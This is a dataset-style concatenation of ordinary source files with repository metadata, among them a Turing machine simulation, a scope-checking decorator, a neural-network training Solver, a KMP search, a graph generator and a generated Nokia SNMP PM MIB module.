0f3a73e751671254e4991470d00ff51b9c7ef8c4 | 1ace6b79b41b69006de37fe936964b3087e67736 | /1-5.py | 9f9b5076ac092e9e7cb6d4f14ebb4149b3ebfd2c | [] | no_license | thlong78984278/Crypto | 77f38d94e727a7872f89cd565b675024f0a7c932 | 2f3f46aa744c7292f6e31260b05329bc0cada817 | refs/heads/main | 2023-04-11T09:11:06.785153 | 2021-04-21T13:54:06 | 2021-04-21T13:54:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 840 | py | from turing_machine import TuringMachine2
transition_function = {
("init"," "):("q0","R"),
("q0","0"):("q1","X"),
("q0","1"):("n","1"),
("q0","X"):("y","X"),
("q1","X"):("q2","R"),
("q2","0"):("q2","R"),
("q2","X"):("n","X"),
("q2","1"):("q3","R"),
("q3","1"):("q3","R"),
("q3","0"):("n","0"),
("q3"," "):("q4","L"),
("q3","X"):("q4","L"), # ->|
("q4","1"):("q5","X"),
("q5","X"):("q6","L"),
("q6","0"):("q6","L"),
("q6","1"):("q6","L"),
("q6","X"):("q0","R")
}
# 00001111
# X X
final_states = { "n", "y"}
t = TuringMachine2(" 0000011111",
initial_state="init",
final_states=final_states,
transition_function=transition_function)
print("Input on tape:\n", t.get_tape())
while not t.final():
t.step() | [
"[email protected]"
] | |
67878e053fb1001efd8f2518f446de52112fa2b8 | 940bb431eff5192f7332e749fba0a4874630beb8 | /src/middleware_security/utils.py | 81cdf4f30af14ea902c502d845cfa62dcef032db | [] | no_license | red-cientifica-peruana/middleware-security | 63c9374f3547cb5ed4b4848860f1f976aba457b7 | 23479f532d26353291c2972881a29a7df31f2f5c | refs/heads/master | 2021-01-12T10:15:19.866181 | 2018-07-18T14:55:37 | 2018-07-18T14:55:37 | 76,400,086 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,560 | py | from functools import wraps
from falcon_exceptions import HTTPException
def scope_verify(scope=None):
""" Decorator for scope verify """
def method_decorator(func):
@wraps(func)
def method_wrapper(*args, **kwargs):
scope_obj = args[0].scope if not scope else scope
context = args[1].context
if isinstance(scope_obj, dict):
func_name = func.__name__.split('_')
scope_obj = scope_obj.get(func_name[1], None)
if not 'token_scopes' in context:
func(*args, **kwargs)
else:
if scope_obj is None:
raise HTTPException(500, "The scope was not set correctly")
token_scopes = context['token_scopes']
parts_scope = scope_obj.split(':')
if len(parts_scope) < 3 or len(parts_scope) > 3:
raise HTTPException(500, "The scope was not set correctly")
if (parts_scope[0] not in token_scopes or
parts_scope[1] not in token_scopes[parts_scope[0]] or
parts_scope[2] not in token_scopes[parts_scope[0]][parts_scope[1]]):
raise HTTPException(
403,
dev_msg="You are not authorized to perform this action",
user_msg="No se encuentra autorizado para realizar esta acción")
func(*args, **kwargs)
return method_wrapper
return method_decorator
| [
"[email protected]"
] | |
bc4d884d0c92d2823f1ba3f94f059e5ec5ea1670 | 3586b39f6c2a587077dd60cd518e862b65bec47e | /100-Days-of-Python/Day-17/main.py | 80d3a1a2fda636bef136753773feeee959abd5aa | [] | no_license | hpisme/Python-Projects | 9e7f483a228ab18f4cb22810a8e23cf379f315bc | 2d8605c324c30e83390dafd6bf63b164372905ba | refs/heads/main | 2023-05-20T12:40:37.122173 | 2021-06-05T23:18:14 | 2021-06-05T23:18:14 | 367,402,588 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 540 | py | from question_model import Question
from data import question_data
from quiz_brain import QuizBrain
question_bank = []
for question in question_data:
question_text = question["text"]
question_answer = question["answer"]
new_question = Question(question_text, question_answer)
question_bank.append(new_question)
new_quiz = QuizBrain(question_bank)
while new_quiz.still_has_questions():
new_quiz.next_question()
print("You've completed the quiz.")
print(f"Your final score is {new_quiz.score} / {len(question_bank)}")
| [
"[email protected]"
] | |
14082e84e8cc42dec1bcbc028a0ce10087db4dd4 | 4d4fcde3efaa334f7aa56beabd2aa26fbcc43650 | /server/src/uds/migrations/0039_auto_20201111_1329.py | 4d48ca91318e70def9c7828155e6812d0e528f18 | [] | no_license | xezpeleta/openuds | a8b11cb34eb0ef7bb2da80f67586a81b2de229ef | 840a7a02bd7c9894e8863a8a50874cdfdbf30fcd | refs/heads/master | 2023-08-21T17:55:48.914631 | 2021-10-06T10:39:06 | 2021-10-06T10:39:06 | 414,489,331 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 676 | py | # Generated by Django 3.1.2 on 2020-11-11 13:29
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('uds', '0038_auto_20200505_config'),
]
operations = [
migrations.RemoveField(
model_name='metapool',
name='accessCalendars',
),
migrations.RemoveField(
model_name='metapool',
name='pools',
),
migrations.RemoveField(
model_name='servicepool',
name='accessCalendars',
),
migrations.RemoveField(
model_name='servicepool',
name='actionsCalendars',
),
]
| [
"[email protected]"
] | |
9177310144ac6320e28207fa88ccaac564986c25 | f827a5caefb76c3b34bc4264f05b8f6e02846be8 | /assignment2/cs231n/solver.py | 1733b52c5e35c740651ea2c8c0403545dbd73e37 | [] | no_license | kujira70/CS231 | 8cdf279d231088f3a7b4068e2199394c2ff2e2c2 | 8c837bc7ec2afece1aebcf0724dd18908aec61c9 | refs/heads/master | 2022-04-26T01:10:20.259944 | 2022-04-17T03:35:10 | 2022-04-17T03:35:10 | 138,230,742 | 1 | 0 | null | 2018-06-21T23:08:04 | 2018-06-21T23:08:04 | null | UTF-8 | Python | false | false | 12,147 | py | from __future__ import print_function, division
from future import standard_library
standard_library.install_aliases()
from builtins import range
from builtins import object
import os
import pickle as pickle
import numpy as np
from cs231n import optim
class Solver(object):
"""
A Solver encapsulates all the logic necessary for training classification
models. The Solver performs stochastic gradient descent using different
update rules defined in optim.py.
The solver accepts both training and validation data and labels so it can
periodically check classification accuracy on both training and validation
data to watch out for overfitting.
To train a model, you will first construct a Solver instance, passing the
model, dataset, and various options (learning rate, batch size, etc) to the
constructor. You will then call the train() method to run the optimization
procedure and train the model.
After the train() method returns, model.params will contain the parameters
that performed best on the validation set over the course of training.
In addition, the instance variable solver.loss_history will contain a list
of all losses encountered during training and the instance variables
solver.train_acc_history and solver.val_acc_history will be lists of the
accuracies of the model on the training and validation set at each epoch.
Example usage might look something like this:
data = {
'X_train': # training data
'y_train': # training labels
'X_val': # validation data
'y_val': # validation labels
}
model = MyAwesomeModel(hidden_size=100, reg=10)
solver = Solver(model, data,
update_rule='sgd',
optim_config={
'learning_rate': 1e-3,
},
lr_decay=0.95,
num_epochs=10, batch_size=100,
print_every=100)
solver.train()
A Solver works on a model object that must conform to the following API:
- model.params must be a dictionary mapping string parameter names to numpy
arrays containing parameter values.
- model.loss(X, y) must be a function that computes training-time loss and
gradients, and test-time classification scores, with the following inputs
and outputs:
Inputs:
- X: Array giving a minibatch of input data of shape (N, d_1, ..., d_k)
- y: Array of labels, of shape (N,) giving labels for X where y[i] is the
label for X[i].
Returns:
If y is None, run a test-time forward pass and return:
- scores: Array of shape (N, C) giving classification scores for X where
scores[i, c] gives the score of class c for X[i].
If y is not None, run a training time forward and backward pass and
return a tuple of:
- loss: Scalar giving the loss
- grads: Dictionary with the same keys as self.params mapping parameter
names to gradients of the loss with respect to those parameters.
"""
def __init__(self, model, data, **kwargs):
"""
Construct a new Solver instance.
Required arguments:
- model: A model object conforming to the API described above
- data: A dictionary of training and validation data containing:
'X_train': Array, shape (N_train, d_1, ..., d_k) of training images
'X_val': Array, shape (N_val, d_1, ..., d_k) of validation images
'y_train': Array, shape (N_train,) of labels for training images
'y_val': Array, shape (N_val,) of labels for validation images
Optional arguments:
- update_rule: A string giving the name of an update rule in optim.py.
Default is 'sgd'.
- optim_config: A dictionary containing hyperparameters that will be
passed to the chosen update rule. Each update rule requires different
hyperparameters (see optim.py) but all update rules require a
'learning_rate' parameter so that should always be present.
- lr_decay: A scalar for learning rate decay; after each epoch the
learning rate is multiplied by this value.
- batch_size: Size of minibatches used to compute loss and gradient
during training.
- num_epochs: The number of epochs to run for during training.
- print_every: Integer; training losses will be printed every
print_every iterations.
- verbose: Boolean; if set to false then no output will be printed
during training.
- num_train_samples: Number of training samples used to check training
accuracy; default is 1000; set to None to use entire training set.
- num_val_samples: Number of validation samples to use to check val
accuracy; default is None, which uses the entire validation set.
- checkpoint_name: If not None, then save model checkpoints here every
epoch.
"""
self.model = model
self.X_train = data['X_train']
self.y_train = data['y_train']
self.X_val = data['X_val']
self.y_val = data['y_val']
# Unpack keyword arguments
self.update_rule = kwargs.pop('update_rule', 'sgd')
self.optim_config = kwargs.pop('optim_config', {})
self.lr_decay = kwargs.pop('lr_decay', 1.0)
self.batch_size = kwargs.pop('batch_size', 100)
self.num_epochs = kwargs.pop('num_epochs', 10)
self.num_train_samples = kwargs.pop('num_train_samples', 1000)
self.num_val_samples = kwargs.pop('num_val_samples', None)
self.checkpoint_name = kwargs.pop('checkpoint_name', None)
self.print_every = kwargs.pop('print_every', 10)
self.verbose = kwargs.pop('verbose', True)
# Throw an error if there are extra keyword arguments
if len(kwargs) > 0:
extra = ', '.join('"%s"' % k for k in list(kwargs.keys()))
raise ValueError('Unrecognized arguments %s' % extra)
# Make sure the update rule exists, then replace the string
# name with the actual function
if not hasattr(optim, self.update_rule):
raise ValueError('Invalid update_rule "%s"' % self.update_rule)
self.update_rule = getattr(optim, self.update_rule)
self._reset()
def _reset(self):
"""
Set up some book-keeping variables for optimization. Don't call this
manually.
"""
# Set up some variables for book-keeping
self.epoch = 0
self.best_val_acc = 0
self.best_params = {}
self.loss_history = []
self.train_acc_history = []
self.val_acc_history = []
# Make a deep copy of the optim_config for each parameter
self.optim_configs = {}
for p in self.model.params:
d = {k: v for k, v in self.optim_config.items()}
self.optim_configs[p] = d
def _step(self):
"""
Make a single gradient update. This is called by train() and should not
be called manually.
"""
# Make a minibatch of training data
num_train = self.X_train.shape[0]
batch_mask = np.random.choice(num_train, self.batch_size)
X_batch = self.X_train[batch_mask]
y_batch = self.y_train[batch_mask]
# Compute loss and gradient
loss, grads = self.model.loss(X_batch, y_batch)
self.loss_history.append(loss)
# Perform a parameter update
for p, w in self.model.params.items():
dw = grads[p]
config = self.optim_configs[p]
next_w, next_config = self.update_rule(w, dw, config)
self.model.params[p] = next_w
self.optim_configs[p] = next_config
def _save_checkpoint(self):
if self.checkpoint_name is None: return
checkpoint = {
'model': self.model,
'update_rule': self.update_rule,
'lr_decay': self.lr_decay,
'optim_config': self.optim_config,
'batch_size': self.batch_size,
'num_train_samples': self.num_train_samples,
'num_val_samples': self.num_val_samples,
'epoch': self.epoch,
'loss_history': self.loss_history,
'train_acc_history': self.train_acc_history,
'val_acc_history': self.val_acc_history,
}
filename = '%s_epoch_%d.pkl' % (self.checkpoint_name, self.epoch)
if self.verbose:
print('Saving checkpoint to "%s"' % filename)
with open(filename, 'wb') as f:
pickle.dump(checkpoint, f)
def check_accuracy(self, X, y, num_samples=None, batch_size=100):
"""
Check accuracy of the model on the provided data.
Inputs:
- X: Array of data, of shape (N, d_1, ..., d_k)
- y: Array of labels, of shape (N,)
- num_samples: If not None, subsample the data and only test the model
on num_samples datapoints.
- batch_size: Split X and y into batches of this size to avoid using
too much memory.
Returns:
- acc: Scalar giving the fraction of instances that were correctly
classified by the model.
"""
# Maybe subsample the data
N = X.shape[0]
if num_samples is not None and N > num_samples:
mask = np.random.choice(N, num_samples)
N = num_samples
X = X[mask]
y = y[mask]
# Compute predictions in batches
num_batches = N // batch_size
if N % batch_size != 0:
num_batches += 1
y_pred = []
for i in range(num_batches):
start = i * batch_size
end = (i + 1) * batch_size
scores = self.model.loss(X[start:end])
y_pred.append(np.argmax(scores, axis=1))
y_pred = np.hstack(y_pred)
acc = np.mean(y_pred == y)
return acc
def train(self):
"""
Run optimization to train the model.
"""
num_train = self.X_train.shape[0]
iterations_per_epoch = max(num_train // self.batch_size, 1)
num_iterations = self.num_epochs * iterations_per_epoch
for t in range(num_iterations):
self._step()
# Maybe print training loss
if self.verbose and t % self.print_every == 0:
print('(Iteration %d / %d) loss: %f' % (
t + 1, num_iterations, self.loss_history[-1]))
# At the end of every epoch, increment the epoch counter and decay
# the learning rate.
epoch_end = (t + 1) % iterations_per_epoch == 0
if epoch_end:
self.epoch += 1
for k in self.optim_configs:
self.optim_configs[k]['learning_rate'] *= self.lr_decay
# Check train and val accuracy on the first iteration, the last
# iteration, and at the end of each epoch.
first_it = (t == 0)
last_it = (t == num_iterations - 1)
if first_it or last_it or epoch_end:
train_acc = self.check_accuracy(self.X_train, self.y_train,
num_samples=self.num_train_samples)
val_acc = self.check_accuracy(self.X_val, self.y_val,
num_samples=self.num_val_samples)
self.train_acc_history.append(train_acc)
self.val_acc_history.append(val_acc)
self._save_checkpoint()
if self.verbose:
print('(Epoch %d / %d) train acc: %f; val_acc: %f' % (
self.epoch, self.num_epochs, train_acc, val_acc))
# Keep track of the best model
if val_acc > self.best_val_acc:
self.best_val_acc = val_acc
self.best_params = {}
for k, v in self.model.params.items():
self.best_params[k] = v.copy()
# At the end of training swap the best params into the model
self.model.params = self.best_params
| [
"[email protected]"
] | |
2e0ccc75e8c2d4ee4a8d8c0cbb29d30c6e44106e | bdd7779b8fd15e96ed09111843e3f202108b78fd | /cos1.py | e12c34abc8d6e5f995c2b104df912270bdd3a28f | [] | no_license | s22624-pjwstk/konsulatacje | aa63216e96e5cfa1a25ab27853cad2920ab8b1f9 | 8742f806d8ca8413a4a833017cdcfc1ef436e78a | refs/heads/main | 2023-03-27T07:04:18.569441 | 2021-03-30T19:41:54 | 2021-03-30T19:41:54 | 353,121,341 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 642 | py | def cos(x):
print(x)
cos(2)
def zewnetrzna(a):
def wewnetrzna():
print(a)
wewnetrzna()
zewnetrzna(3)
def operator(s):
def plus(a,b):
return a+b
def minus(a,b):
return a-b
if s=="+":
return plus
elif s=="-":
return minus
o=operator("+")
print(o)
print(o(2,3))
def add(n):
def add_imple(x):
return n+x
return add_imple
print(add(1)(2))
def mr(fn):
def jakkolwiek(s):
s="mr {}".format(s)
return fn(s)
return jakkolwiek
@mr
def hello(s):
return "hello {}".format(s)
print(hello("Darek")) | [
"[email protected]"
] | |
d1e8f367dd86118abe6879d5f86109637b40400a | 3b36a274dc6b6aa4417fc6d859436d5f50f208b7 | /KMP.py | 3b82377f2029ab61c092e42a95ed8f8d7ceaddb9 | [] | no_license | saife245/ALGORITHM-AND-DATA-STRUCTURE | 66baca2ba63d3b2cffcdafc19cd82913d18f47be | cd7145beaf0973463805abff5c498b98e2e88c80 | refs/heads/master | 2020-03-28T06:16:26.058603 | 2018-11-17T18:26:15 | 2018-11-17T18:26:15 | 147,824,324 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 891 | py | def KMP(pattern, string):
m = len(pattern)
n = len(string)
s = [0]*(n)
j = 0
calc_next(pattern, m, s)
i = 0
while i < n:
if pattern[j] == string[i]:
i += 1
j += 1
if j == m:
print ("Found at " + str(i-j))
j = s[j-1]
elif i < n and pattern[j] != string[i]:
if j != 0:
j = s[j-1]
else:
i += 1
def calc_next(pattern, n, s):
l = 0
s[0]
i = 1
while i < n:
if pattern[i]== pattern[l]:
l += 1
s[i] = l
i += 1
else:
if l != 0:
l = s[l-1]
else:
s[i] = 0
i += 1
string = "banananobano"
pattern = "nano"
KMP(pattern, string) | [
"[email protected]"
] | |
f09d106fdba174b4d50bd24e47c76d79bcff3de6 | 9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97 | /sdBs/AllRun/galex_j16155+5048/sdB_galex_j16155+5048_coadd.py | 910403f482b6eda6d8e12bdf3a0cae2ad2051389 | [] | no_license | tboudreaux/SummerSTScICode | 73b2e5839b10c0bf733808f4316d34be91c5a3bd | 4dd1ffbb09e0a599257d21872f9d62b5420028b0 | refs/heads/master | 2021-01-20T18:07:44.723496 | 2016-08-08T16:49:53 | 2016-08-08T16:49:53 | 65,221,159 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 453 | py | from gPhoton.gMap import gMap
def main():
gMap(band="NUV", skypos=[243.88925,50.807131], skyrange=[0.0333333333333,0.0333333333333], stepsz = 30., cntfile="/data2/fleming/GPHOTON_OUTPUT/LIGHTCURVES/sdBs/sdB_galex_j16155+5048/sdB_galex_j16155+5048_movie_count.fits", cntcoaddfile="/data2/fleming/GPHOTON_OUTPUT/LIGHTCURVES/sdB/sdB_galex_j16155+5048/sdB_galex_j16155+5048_count_coadd.fits", overwrite=True, verbose=3)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
520f84d54ac2da80bd3c31865bc75383a40b08e6 | 77f9dc39ea7bbf904201ccfda9a806ce8c68605d | /hamiltonian_cycle/erdos_renyi_model_generation.py | fce71db43449b9c453ae3476eddd7a16fdb42fa8 | [] | no_license | TzuriR/Complex-Networks | c5787ab5be27d9c4356dd12e36deb5f0f11a8ac0 | 76cd862193e699799d87177a19b7cd792eaf7a52 | refs/heads/main | 2023-06-05T10:43:02.045696 | 2021-06-23T18:36:26 | 2021-06-23T18:36:26 | 308,382,110 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,428 | py | import networkx as nx
import matplotlib.pyplot as plt
# Generate graph
def gen_graph(n, p):
g = nx.generators.random_graphs.erdos_renyi_graph(n, p)
print("g.nodes:", g.nodes)
print("g.edges:", g.edges)
nx.draw(g, with_labels=True)
plt.savefig("simple_path.png")
plt.show()
'''
g.nodes:
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
g.edges:
[(0, 1), (0, 2), (0, 5), (0, 7), (0, 8), (1, 3), (1, 5), (1, 6), (1, 8), (1, 9), (2, 3), (2, 4), (2, 5), (2, 6),
(2, 8), (3, 5), (3, 7), (3, 8), (3, 9), (4, 5), (4, 7), (5, 6), (5, 7), (5, 8), (6, 7), (6, 9), (7, 8)]
# Example: do cycle with rotation - 10
g = nx.Graph()
g.add_nodes_from([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])
g.add_edge(0, 1)
g.add_edge(0, 2)
g.add_edge(0, 8)
g.add_edge(1, 4)
g.add_edge(1, 5)
g.add_edge(2, 4)
g.add_edge(2, 8)
g.add_edge(3, 4)
g.add_edge(3, 6)
g.add_edge(3, 7)
g.add_edge(3, 8)
g.add_edge(3, 9)
g.add_edge(4, 5)
g.add_edge(4, 7)
g.add_edge(4, 9)
g.add_edge(5, 8)
g.add_edge(5, 9)
g.add_edge(6, 7)
g.add_edge(6, 8)
g.add_edge(7, 8)
g.add_edge(7, 9)
nx.draw(G, with_labels=True)
plt.savefig("simple_path.png")
plt.show()
#Example: do cycle without rotation - 6
g = nx.Graph()
g.add_nodes_from([0, 1, 2, 3, 4, 5])
g.add_edge(0, 1)
g.add_edge(0, 3)
g.add_edge(0, 5)
g.add_edge(1, 2)
g.add_edge(1, 3)
g.add_edge(1, 4)
g.add_edge(2, 4)
g.add_edge(4, 5)
nx.draw(G, with_labels=True)
plt.savefig("simple_path.png")
plt.show()
#Example: do cycle without rotation - 10
g = nx.Graph()
g.add_nodes_from([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])
g.add_edge(0, 4)
g.add_edge(0, 6)
g.add_edge(0, 7)
g.add_edge(0, 9)
g.add_edge(1, 2)
g.add_edge(1, 3)
g.add_edge(1, 5)
g.add_edge(1, 6)
g.add_edge(1, 7)
g.add_edge(2, 3)
g.add_edge(2, 5)
g.add_edge(2, 6)
g.add_edge(2, 7)
g.add_edge(3, 4)
g.add_edge(3, 5)
g.add_edge(3, 7)
g.add_edge(4, 6)
g.add_edge(4, 7)
g.add_edge(4, 8)
g.add_edge(5, 6)
g.add_edge(5, 7)
g.add_edge(6, 8)
g.add_edge(6, 9)
g.add_edge(8, 9)
nx.draw(G, with_labels=True)
plt.savefig("simple_path.png")
plt.show()
return G
'''
return g
| [
"[email protected]"
] | |
04b8ed50c24c320d25836ef6911aab27ca4dc7b7 | 85a9ffeccb64f6159adbd164ff98edf4ac315e33 | /pysnmp-with-texts/NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP.py | da7cb8b996dbd193802a4c80260e2d37c3f3b78e | [
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | agustinhenze/mibs.snmplabs.com | 5d7d5d4da84424c5f5a1ed2752f5043ae00019fb | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | refs/heads/master | 2020-12-26T12:41:41.132395 | 2019-08-16T15:51:41 | 2019-08-16T15:53:57 | 237,512,469 | 0 | 0 | Apache-2.0 | 2020-01-31T20:41:36 | 2020-01-31T20:41:35 | null | UTF-8 | Python | false | false | 17,953 | py | #
# PySNMP MIB module NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-IRP
# Produced by pysmi-0.3.4 at Wed May 1 14:23:28 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
ObjectIdentifier, Integer, OctetString = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "Integer", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, ValueRangeConstraint, ConstraintsIntersection, ConstraintsUnion, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ValueRangeConstraint", "ConstraintsIntersection", "ConstraintsUnion", "SingleValueConstraint")
NoiAdditionalText, NoiEventTime, NoiAlarmTableCount = mibBuilder.importSymbols("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-COMMON-DEFINITION", "NoiAdditionalText", "NoiEventTime", "NoiAlarmTableCount")
NoiMeasurementJobStatus, NoiMeasurementResultTransfer, NoiMeasurementResultIdentifier, NoiMeasurementFileTransfer, NoiMeasurementFileName, NoiMeasurementActivationError, NoiMeasurementFileDirectory = mibBuilder.importSymbols("NOKIA-ENHANCED-SNMP-SOLUTION-SUITE-PM-COMMON-DEFINITION", "NoiMeasurementJobStatus", "NoiMeasurementResultTransfer", "NoiMeasurementResultIdentifier", "NoiMeasurementFileTransfer", "NoiMeasurementFileName", "NoiMeasurementActivationError", "NoiMeasurementFileDirectory")
noiPmTable, noiPmCompliance, noiPmVariable, noiOpenInterfaceModule, noiPmNotification = mibBuilder.importSymbols("NOKIA-NE3S-REGISTRATION-MIB", "noiPmTable", "noiPmCompliance", "noiPmVariable", "noiOpenInterfaceModule", "noiPmNotification")
ModuleCompliance, NotificationGroup, ObjectGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup", "ObjectGroup")
Gauge32, ModuleIdentity, NotificationType, Bits, Unsigned32, MibIdentifier, MibScalar, MibTable, MibTableRow, MibTableColumn, IpAddress, iso, ObjectIdentity, Counter32, Counter64, TimeTicks, Integer32 = mibBuilder.importSymbols("SNMPv2-SMI", "Gauge32", "ModuleIdentity", "NotificationType", "Bits", "Unsigned32", "MibIdentifier", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "IpAddress", "iso", "ObjectIdentity", "Counter32", "Counter64", "TimeTicks", "Integer32")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
noiSnmpPmIrp = ModuleIdentity((1, 3, 6, 1, 4, 1, 94, 7, 1, 1, 4))
noiSnmpPmIrp.setRevisions(('1970-01-01 00:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: noiSnmpPmIrp.setRevisionsDescriptions(('Version 1.0.6',))
if mibBuilder.loadTexts: noiSnmpPmIrp.setLastUpdated('200227020000Z')
if mibBuilder.loadTexts: noiSnmpPmIrp.setOrganization('Nokia Networks')
if mibBuilder.loadTexts: noiSnmpPmIrp.setContactInfo('e-mail: NET-OSS-OPEN-SNMP DL (Microsoft Outlook, Nokia internal) [email protected]')
if mibBuilder.loadTexts: noiSnmpPmIrp.setDescription('This SNMP MIB-module specifies the SNMP Solution Set of the PM Integration Reference Point (IRP) also known as Enhanced SNMP Solution Suite. The purpose of this IRP is to define an interface though which a network element manager or a network element) can communicate PM information for its managed objects to Nokia OS, NetAct.')
noiPmIrpVersion = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 2, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(5, 5)).setFixedLength(5)).setMaxAccess("readonly")
if mibBuilder.loadTexts: noiPmIrpVersion.setStatus('current')
if mibBuilder.loadTexts: noiPmIrpVersion.setDescription("This object represents the version of the PM IRP supported by the agent. The format is 'n.m,o', where 'n' is the main version number of the interface model and 'm' and 'o' the release number within the main version. This version is 1.0.6")
noiPmFileTransferProtocol = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 2, 2), NoiMeasurementFileTransfer()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: noiPmFileTransferProtocol.setStatus('current')
if mibBuilder.loadTexts: noiPmFileTransferProtocol.setDescription('Contains the supported file transfer mechanism for various files within NE3S. NetAct does not modify this object, but it shall be the responsibility of the agent to set the appropriate values. From a NetAct perspective, this object is treated as it would be specified as read-only. The object has been declared as read-write, to allow for instance configuring this value by an EM.')
noiPmResultTransfer = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 2, 3), NoiMeasurementResultTransfer()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: noiPmResultTransfer.setStatus('current')
if mibBuilder.loadTexts: noiPmResultTransfer.setDescription('Contains the supported transfer mechanism for measurement result, e.g. notification based or polling based. NetAct does not modify this object, but it shall be the responsibility of the agent to set the appropriate values. From a NetAct perspective, this object is treated as it would be specified as read-only. The object has been declared as read-write, to allow for instance configuring this value by an EM.')
noiMeasurementScheduleFileDirectory = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 2, 4), NoiMeasurementFileDirectory()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: noiMeasurementScheduleFileDirectory.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementScheduleFileDirectory.setDescription('Contains the directory where the measurement schedule file is stored within the agent. The manager polls the value before downloading the measurement file. NetAct does not modify this object, but it shall be the responsibility of the agent to set the appropriate values. From a NetAct perspective, this object is treated as it would be specified as read-only. The object has been declared as read-write, to allow for instance configuring this value by an EM.')
noiMeasurementRepositoryDirectory = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 2, 5), NoiMeasurementFileDirectory()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: noiMeasurementRepositoryDirectory.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementRepositoryDirectory.setDescription('Contains the directory where the measurement repository file is stored within the agent. The manager polls the value before retrieving the repository file. NetAct does not modify this object, but it shall be the responsibility of the agent to set the appropriate values. From a NetAct perspective, this object is treated as it would be specified as read-only. The object has been declared as read-write, to allow for instance configuring this value by an EM.')
noiMeasurementRepositoryFile = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 2, 6), NoiMeasurementFileName()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: noiMeasurementRepositoryFile.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementRepositoryFile.setDescription('Contains the file name of the repository file. The manager polls the value before retrieving the repository file. NetAct does not modify this object, but it shall be the responsibility of the agent to set the appropriate values. From a NetAct perspective, this object is treated as it would be specified as read-only. The object has been declared as read-write, to allow for instance configuring this value by an EM.')
noiMeasurementJobStatus = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 2, 7), NoiMeasurementJobStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: noiMeasurementJobStatus.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementJobStatus.setDescription('This object represent the measurement job status. The agent will update the value according to the state model defined in the interface specification.')
noiMeasurementActivationError = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 2, 8), NoiMeasurementActivationError()).setMaxAccess("readonly")
if mibBuilder.loadTexts: noiMeasurementActivationError.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementActivationError.setDescription('Contains the error code in case of failure in measurement administration.')
noiPmAdditionalText = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 2, 9), NoiAdditionalText()).setMaxAccess("readonly")
if mibBuilder.loadTexts: noiPmAdditionalText.setStatus('current')
if mibBuilder.loadTexts: noiPmAdditionalText.setDescription('Contains additional text and is used in conjunction with the notification noiMeasurementResultTableRebuild and in case of failure in measurement administration.')
noiPmFileStoringPeriod = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 2, 10), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: noiPmFileStoringPeriod.setStatus('current')
if mibBuilder.loadTexts: noiPmFileStoringPeriod.setDescription(' Contains the storage duraion for the measurement file in the agent. Duration in minutes. NetAct does not modify this object, but it shall be the responsibility of the agent to set the appropriate values. From a NetAct perspective, this object is treated as it would be specified as read-only. The object has been declared as read-write, to allow for instance configuring this value by an EM.')
noiMeasurementResultTableCount = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 4, 1), NoiAlarmTableCount()).setMaxAccess("readonly")
if mibBuilder.loadTexts: noiMeasurementResultTableCount.setStatus('current')
if mibBuilder.loadTexts: noiMeasurementResultTableCount.setDescription('Contains the number or current active entries in the measurement table. When the table is empty, the value of this object is zero (0).')
noiMeasurementResultTableMaxCount = MibScalar((1, 3, 6, 1, 4, 1, 94, 7, 3, 4, 2), NoiAlarmTableCount()).setMaxAccess("readonly")
if mibBuilder.loadTexts: noiMeasurementResultTableMaxCount.setStatus('current')
